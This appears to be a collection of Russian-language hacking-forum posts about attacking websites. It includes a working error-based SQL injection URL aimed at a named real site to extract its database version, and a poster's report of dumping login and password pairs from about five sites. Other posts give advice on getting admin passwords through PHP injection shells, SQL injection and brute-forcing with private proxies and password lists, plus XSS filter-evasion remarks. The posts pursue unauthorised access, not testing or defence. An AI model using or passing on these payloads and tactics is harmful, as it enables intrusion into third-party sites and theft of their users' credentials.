UTF-7 сработает только если в браузере стоит автоопределение кодировки, да и то, если браузер поддерживает UTF-7 кодировку вообще. Не очень актуально для современных браузеров
Он хочет например через str_replace() заменять в передаваемых гетом/постом запросах латинские буквы на русские, чтобы если ты передаешь гетом или постом что то типа "...script" оно менялось на русские буквы и не пахало. Это не самый лутший вариант. Но хочу повторить: здесь раздел для обсуждения УЯЗВИМОСТЕЙ, по поводу защиты пиши в кодинг.
Посмотрите еще вот это плиз www.bulletinpa.com/index.php?id=700%27 вот такая ошибка Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 www.bulletinpa.com/index.php?id=700 and 1=0 резульатат тот же что и: www.bulletinpa.com/index.php?id=700 почему так происходит?
Code: http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/* версия видна ('5.0.32-Debian_7etch1-log') 2. МБ фильтрация (Т.К вроде идет Blind sql)
люди, вот за сегодня сайтов 5 раскрутил до вида логин;пасс и нашел админки. Но ни одна пара логина и пароля не подошла и с такой проблемой я сталкиваюсь ооочень часто. П.С. Пары,уверен, с админскими правами
Чото не получается с XSS видно защита какаято или хз((( Есть еще варианты получить пасс админа??(кроме брута)
php injection (шелл) sql injection (пассы юзеров, может быть что и админа) брут сайтов + приват прокси + хороший пасс лист ( и мон кучу юзеров сбрутить)
php injection - http://forum.antichat.ru/thread12123.html sql injection - http://forum.antichat.ru/thread43966.html неужели трудно было самому найти
[x60]unu, выручай никак не могу разобрать твой хитрый запрос.... почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST.... сижу вот голову ломаю, никак не разобрался =(
нашел вроде как инъекцию в поиске, но результат вылетел какойто запутанный: как в данном случае можно подставить запрос?